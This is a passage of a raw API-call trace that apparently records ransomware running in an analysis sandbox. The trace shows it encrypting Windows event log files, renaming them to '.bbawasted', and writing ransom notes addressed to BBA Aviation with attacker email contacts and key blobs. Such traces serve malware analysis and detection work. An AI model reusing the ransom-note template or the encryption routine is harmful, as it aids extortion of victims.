(lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 90 [0180.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2be) returned 0x6aecf0 [0180.853] lstrcpyW (in: lpString1=0x6aeda4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0180.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.853] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0180.854] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0180.854] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0180.854] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0180.854] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0180.855] SetEndOfFile (hFile=0x28c) returned 1 [0180.856] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0180.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.856] lstrcpyW (in: lpString1=0x6aeda4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0180.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.bbawasted")) returned 1 [0181.031] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0181.031] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0181.031] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0181.031] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0181.031] CloseHandle (hObject=0x280) returned 1 [0181.284] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0181.284] CloseHandle (hObject=0x294) returned 1 [0181.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0181.284] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0181.285] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0181.285] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0181.285] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0181.286] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0181.286] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0181.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0181.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0181.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0181.296] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EU22BTs94WeE1ywtJTE7LObKPzTFXXIt65FOXp7caEl6aN7G2fbp5Fv5D91bj8X1\r\nOcaWCGqrUN1Wy9NaXjB5sXNFZYKQwhvk4bIHdlhqsWassw8BmurfjZx8Eqjb0x5Y\r\nTrxAnLj97B2FZgX/T1JzrT8ecP6s3+c6iLuB989I7wfH/7MTmqnjGV+laNl5PzDn\r\nkmKG8J1PqEV/W8sFsS0NfjFE0gNDUHGlFzQ6SfLBW89hgQ4lhMPi1IgrCe8auQEt\r\ngb/ju5y3ikYf7VRP36AYrqhHtKBWrJ7R/w7YRLMd+5mZGXlXNJUmUD2a9JTttvnO\r\ngTcF+JLAkmAF68v54Tk6mSo0R+M21EOU+SXu0Aay5lcv8l8YqtDhmDFB495jtFLO\r\nr6QpWKAkADf8ocw/BU10XwOY3CzOMLoaBkYNlwMI0A+31OuvsxlXHJQm3p45lzxI\r\nDX8TBZ7hRmCFP2ekhxNgEFd4haFHJ/E7ee7A44aDkZvY+aTK75JD8k3m2EhvWLNf\r\nbsl8H/CL5TiI6sQH/8iqwHL/hs3G53FCqtdIRhhA6l4FjG3Glk8RxYsK4tY93HMW\r\ni8VUAa9mPRw4rS14PnzwsQ1tI8yMBN4/XYv3rkgpDpP76oTYBYWtxr63/MpLgk9s\r\nLsnNxyXlmjyZiVShob579//jbn2W/QLDGcSFPr/mkr/=[end_key]\r\nKEEP IT\r\n") returned 984 [0181.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0181.296] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0181.756] SetEndOfFile (hFile=0x28c) returned 1 [0181.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0181.759] CloseHandle (hObject=0x28c) returned 1 [0181.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0181.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69dac0 | out: hHeap=0x660000) returned 1 [0181.763] _aulldvrm () returned 0x0 [0181.763] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0181.765] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0181.765] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0181.765] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 83 [0181.765] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b0) returned 0x6aecf0 [0181.766] lstrcpyW (in: lpString1=0x6aed96, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0181.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0181.766] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0181.766] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0181.766] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0181.767] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0181.768] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0181.769] SetEndOfFile (hFile=0x28c) returned 1 [0181.769] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0181.770] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0181.770] lstrcpyW (in: lpString1=0x6aed96, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0181.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.bbawasted")) returned 1 [0181.803] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0181.803] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.804] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0181.804] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x5480000 [0181.804] CloseHandle (hObject=0x294) returned 1 [0182.177] UnmapViewOfFile (lpBaseAddress=0x5480000) returned 1 [0182.190] CloseHandle (hObject=0x280) returned 1 [0182.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0182.190] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0182.191] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0182.191] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0182.191] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0182.192] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0182.192] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0182.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0182.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0182.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.315] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ANdWJtDIwHgOuN65rzDakZZozXUMAvTWxMbQZ6osL3GKcBOwHxnN59rrjhMN/xjK\r\nvzaSUp/E2yumh4N7K7LyW0N0BWNE+Rs/RV/YTz37YIDpLtudMmeB/eJP0MUMddgf\r\n/qigMgqtA70dVJHo1WFzW3VB9vGRi8u5NvY3miNCE1sXOHZNkc1ms5J/V1aPUEw0\r\nS8tro68Gkk432LuvM8B49AtcKzBwvbpsGPz9CA7UcqFam1/rccHGPih/EYlBLR+l\r\nL78nDq9l5V721+423dDxvCa4mvWQNhvHPGAA4qh/OO7pyQtNmV3oE0GMgU0oAwqx\r\nLrobBEFOMhYp6xbioHYaxAc72UfpRhzGnApMNZ42SQlbqhVMxIabwRfK1CRIrgBQ\r\nWVr873qNgrYLqQXDpe0REoqgD2DPoiRttLh7hiFCsqsPdAq1gixaqBTvMMMWoBMV\r\nh6n3YULCYhZ4XRjg9b3YYtMxBLMtQtrblFOhTJDj5KZrDjh8Pew/bgFBGNBFrVkn\r\nklJ6qRFmntTYSeufH/dTcFyZxaOTNE7v5mv6uLTG8d9BadcYBQEh1ih9szEQgfXA\r\nFIvnjzTMFaPD9pZF8IalXX629OpevjMJ1Y8Xa/GuGbptKpFjTeUcJLAYEDIMoqH0\r\nB82s1NdYrzCQFd/ZQM1Z9wHQE8Y9rdcgaPBJEzrtVM7=[end_key]\r\nKEEP IT\r\n") returned 984 [0182.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0182.315] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0182.315] SetEndOfFile (hFile=0x28c) returned 1 [0182.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.318] CloseHandle (hObject=0x28c) returned 1 [0182.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0182.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e5a8 | out: hHeap=0x660000) returned 1 [0182.322] _aulldvrm () returned 0x0 [0182.322] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0182.322] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0182.323] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0182.323] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 57 [0182.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27c) returned 0x6aecf0 [0182.323] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0182.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.323] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0182.324] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0182.324] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0182.324] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0182.324] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0182.326] SetEndOfFile (hFile=0x28c) returned 1 [0182.326] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.326] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0182.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.bbawasted")) returned 1 [0182.327] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0182.327] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0182.328] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0182.328] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0182.328] CloseHandle (hObject=0x280) returned 1 [0182.334] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0182.336] CloseHandle (hObject=0x294) returned 1 [0182.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0182.337] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0182.337] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0182.337] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0182.337] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0182.338] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0182.338] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0182.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0182.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0182.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.349] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LmGiXW2DDERdvRdGKhAadfCvjUWv5AUS8HREozkRSXzi5mirtPiNGNcuYU9E4qQK\r\n/sMEhy1NG+soeY4TxYIhIYAYsEgqLDky4OH//ovx0re4k/ZwYJoY7Vc8bScSjrGq\r\nPMwX/A0tjOdI73k5R7r2gk+TBnMwCLJGWAMn9ThtaYcrXZYVnGoPAJEr3hMDJ1Eq\r\nNJfm8N7amzPIdJON2ee2BqUNkA5tYDKWvyIlInCoCOxqYSA7wrhAmtCwAbPgzdl1\r\nPos7On1QV/X27vFYUmFqtVfMNOc5AoXuHM4p0f6cR/zNK3GgerJMM50eLpVn/dHS\r\nbquJsWXkhMG4Ki11/svIYaoO64gyW/KijurC7wzPFtNq5GoQKx3cB/YNDpzSF/D+\r\n1S+wKOd9ArUTDros0ByqVh97i3XIwh1Wk2ZI26KMz4TXrFpEgmWNP/3fpK/PXP6A\r\n4jaxm2DRW2djif7IX9yOtmmVOLvqRT6KjU8ozi84psQTa2FZExdVyxr6neZe5TdZ\r\nr0RtJCxoVsg8OjyDN7ytTxlE8+g5RpMr2lwiXURCnFXmLWLtYoTXdawPT5iMs3pZ\r\ni9iO3Xpi3Mzne69aHjRRLylyGejBJVmWiaYWKlgUIDX725WlKL5qWxMWOLBNg0Wu\r\n0/N194mUT3iZPwF0PjAwJwE3jQy+rIc2Sc8Fngo5Q0M=[end_key]\r\nKEEP IT\r\n") returned 984 [0182.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0182.349] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0182.350] SetEndOfFile (hFile=0x28c) returned 1 [0182.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.439] CloseHandle (hObject=0x28c) returned 1 [0182.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0182.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e6a8 | out: hHeap=0x660000) returned 1 [0182.445] _aulldvrm () returned 0x0 [0182.445] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0182.445] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0182.445] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0182.445] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 60 [0182.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0182.446] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0182.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.446] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0182.446] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0182.446] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0182.446] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0182.448] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0182.449] SetEndOfFile (hFile=0x28c) returned 1 [0182.449] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.449] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0182.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.bbawasted")) returned 1 [0182.450] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 